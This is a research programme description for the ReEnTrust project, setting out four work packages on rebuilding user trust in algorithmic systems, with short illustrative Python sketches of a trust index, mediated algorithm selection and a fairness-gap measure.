Work Packages

The ReEnTrust programme of work consists of four integrated work packages (WPs), described below.

Work Package 1: Responsible policy and practice (lead: Oxford)
This WP will unpack the tensions between the drive for innovation in the design and use of algorithms and the growing desire for meaningful regulation and protection for users. The WP will adopt an RRI approach and carry out literature scoping, interviews, surveys and workshops to consider key questions such as:

  • How do commercial and non-commercial organisations establish and maintain user trust in the algorithmic systems they use?
  • How do they themselves establish trust in their own systems?
  • How might the level of trust in an algorithmic system be quantified in a “trust index”, and how might such an index be of use to system users and providers?
  • When might it be reasonable for different stakeholders to trust an algorithm, and when might other governance structures be needed?
  • How societally acceptable are trust rebuilding systems?
  • How can the design-policy-design relationship be understood and optimised in RRI terms?

Expected outcomes:

  1. Policy guidelines for engendering trust in the design, development, and use of algorithms.
  2. Evidence and documentation describing the RRI methodology developed through ReEnTrust work.
  3. A portfolio of real-world case studies to inform responsible practice.

Work Package 2: User-Centred Trust (lead: Nottingham)
This WP will identify the requirements of trust rebuilding tools and explore the capacity for technical solutions to responsibly rebuild user trust once it has been lost. This will be achieved via two strands of multi-method, user-driven data collection and analysis.

We will identify how social mechanisms in the rebuilding of trust manifest online, and the requirements for the tools and interfaces that would be most effective in supporting the rebuilding of trust. We will run a refined version of the Juries methodology (previously used in UnBias), a participatory research methodology similar to focus groups in which scenarios (i.e., vignettes) are discussed with a view to identifying jurors’ concerns, solutions and critical thinking. Participating groups of older (65+) and younger (16+) adults will co-design and develop interactive (‘hands-on’) scenarios in partnership with project partner Polka Theatre to illustrate instances where trust in algorithmic processes was lost, what the participants did in response, how they felt the platform was responsible, and how the issue was resolved – including how well the platform dealt with the situation and whether trust was regained.

Quantitative measures of psychological wellbeing, agency and self-competence in trust-related situations, drawing on self-determination theory, will inform the development of a “trust index”. Colleagues at the Mental Health Foundation will provide advice to ensure that the index is sensitive to the issues explored through the co-created scenarios and can determine the level of users’ trust when interacting with AI algorithms.
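
How such an index might be computed can be sketched as a weighted composite of survey subscales. The subscale names, weights and scores below are purely hypothetical placeholders, not project outputs:

```python
# Illustrative sketch of a composite "trust index" as a weighted mean of
# 0-100 survey subscale scores. All subscale names, weights and scores
# here are hypothetical placeholders.

def trust_index(scores, weights):
    """Weighted mean of subscale scores, returned on the same 0-100 scale."""
    total_weight = sum(weights.values())
    return sum(scores[k] * weights[k] for k in weights) / total_weight

# Hypothetical subscales loosely based on the measures named above.
weights = {"wellbeing": 0.25, "self_determination": 0.25,
           "agency": 0.25, "self_competence": 0.25}
scores = {"wellbeing": 70, "self_determination": 55,
          "agency": 60, "self_competence": 65}

print(trust_index(scores, weights))  # 62.5
```

In practice the weights would be derived empirically (e.g. from factor analysis of the survey data) rather than fixed a priori.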

Complementing these first two approaches, we will also conduct video-based studies to capture users’ practical experience of trust breakdown. Analysis will focus on the interactions that occur between user and algorithm/platform. It will highlight the kinds of practical behaviours users undertake when seeking to resolve problems of trust breakdown, and the particular platform affordances that alternately encourage or discourage trust.

Expected outcomes:

  1. Guidelines for the development of trust rebuilding tools, including requirements and assessment criteria.
  2. A framework of guidelines for assessing the impact of trust in algorithms on wellbeing, including recommendations about the use and misuse of technologies for citizens’ mental wellbeing.
  3. A “trust index” calculation method to quantify the level of trust users have in an algorithmic system.

Work Package 3: Computational methods for rebuilding trust (lead: Edinburgh)
This WP will develop (semi-)automated mediation techniques that allow users and data-driven online service providers to recover from situations of trust breakdown. A successful recovery would see a productive relationship between users and services rebuilt following negotiated changes to the algorithms that mediate this relationship. Conceptually, we consider the problem of choosing the most acceptable algorithm within a given space of possible choices, based on different users’ feedback on their experience, including trust index metrics, balanced with the platforms’ interests.

We will follow an approach that makes the adversarial nature of these interactions explicit, employing automated negotiation and mediation techniques to tackle the overall challenge. Our approach views these interactions as games, where the users’ action space includes behaviours and judgments, the providers’ action space includes algorithm choices and statements about the properties of these algorithms, and payoffs can be derived from the “players’” preferences over the algorithms and their
understanding of the algorithm’s properties.
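
The mediation step in this game formulation can be illustrated by a minimal sketch in which a mediator selects, from a finite space of algorithm variants, the one maximising a weighted blend of user and provider payoffs. All names, payoff values and the trade-off parameter are hypothetical illustrations, not the project's actual models:

```python
# Minimal sketch of mediated algorithm selection viewed as a game between
# users and a provider. All payoff values and the alpha trade-off below
# are hypothetical placeholders.

def mediate(algorithms, user_payoffs, provider_payoff, alpha=0.5):
    """Return the algorithm maximising a weighted blend of the mean
    user payoff and the provider's payoff (alpha trades the two off)."""
    def blended(a):
        mean_user = sum(u[a] for u in user_payoffs) / len(user_payoffs)
        return alpha * mean_user + (1 - alpha) * provider_payoff[a]
    return max(algorithms, key=blended)

algorithms = ["A", "B", "C"]
# Each user's payoff over the algorithm space (e.g. derived from
# trust-index feedback on their experience with each variant).
user_payoffs = [{"A": 0.9, "B": 0.4, "C": 0.6},
                {"A": 0.7, "B": 0.5, "C": 0.8}]
# The provider's payoff over the same space (the platform's interests).
provider_payoff = {"A": 0.3, "B": 0.9, "C": 0.7}

print(mediate(algorithms, user_payoffs, provider_payoff))  # C
```

Note how the balanced choice (C) differs from what either side would pick alone: with alpha=1.0 the users' favourite (A) wins, and with alpha=0.0 the provider's favourite (B) wins.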

Expected outcomes:

  1. New computational models and algorithms for AI-supported semi-automated mediation.
  2. Analytical and experimental results assessing complexity, efficiency, and usability of these methods.

Work Package 4: A trust rebuilding tool (lead: Edinburgh)
This WP will develop and evaluate a concrete software tool that will embed the computational methods developed in WP3 to provide intelligent trust rebuilding assistance, and several additional functionalities to support the users’ understanding of the algorithms. More specifically, this tool will offer three different sets of functionalities.

  • First, it will allow users to “sandbox” different variations of algorithms to assess their behaviour on different datasets, using tools such as Faircheck/Fairtest and other measurements concerning the performance of machine learning algorithms. This facility will enable users to gain an understanding of different trade-offs and the effects of different parameters, as well as allow them to experience their own response to algorithm behaviour, which will help them shape and refine their views and judgment of the technologies deployed by online platforms.
  • Secondly, it will provide a component to capture experiences, attitudes and opinions of users toward algorithms and the platforms that use them, thus not only acting as an “experience base” to inform collective discourse about trustability, but also allowing us to build the quantitative models of preferences needed for the automated mediation techniques developed in WP3.
  • Finally, it will include a negotiation and mediation component where users and service providers can discuss, debate, and negotiate over the use of algorithms using the structured negotiation dialogue workflows and the automated mediator developed in WP3.
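
The sandboxing functionality can be illustrated with a toy comparison of two algorithm variants under a simple fairness measure. This sketch uses the demographic-parity gap purely as an illustrative metric; it does not represent the Faircheck/Fairtest tools themselves, and all data is made up:

```python
# Illustrative "sandbox" comparison of two algorithm variants on a toy
# dataset, using the demographic-parity gap as an example fairness
# measurement. The variants and data below are hypothetical.

def positive_rate(decisions, groups, group):
    """Fraction of positive (1) decisions given to members of `group`."""
    members = [d for d, g in zip(decisions, groups) if g == group]
    return sum(members) / len(members)

def parity_gap(decisions, groups):
    """Absolute gap in positive-decision rates between groups 0 and 1."""
    return abs(positive_rate(decisions, groups, 0) -
               positive_rate(decisions, groups, 1))

groups = [0, 0, 0, 0, 1, 1, 1, 1]          # group membership per person
variant_a = [1, 1, 1, 0, 1, 0, 0, 0]       # decisions favouring group 0
variant_b = [1, 1, 0, 0, 1, 1, 0, 0]       # equal rates across groups

print(parity_gap(variant_a, groups))  # 0.5
print(parity_gap(variant_b, groups))  # 0.0
```

Surfacing such metrics side by side for different variants is the kind of trade-off comparison the sandbox would let users explore interactively.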

The tool developed in this work package will provide the primary vehicle for validating what technical solutions are possible when attempting to tackle the overall problem of rebuilding trust between users and algorithms on online platforms.

Expected outcomes:

  1. Implemented prototypes of trust rebuilding tools.
  2. Experimental results validating the benefits derived from use of these tools.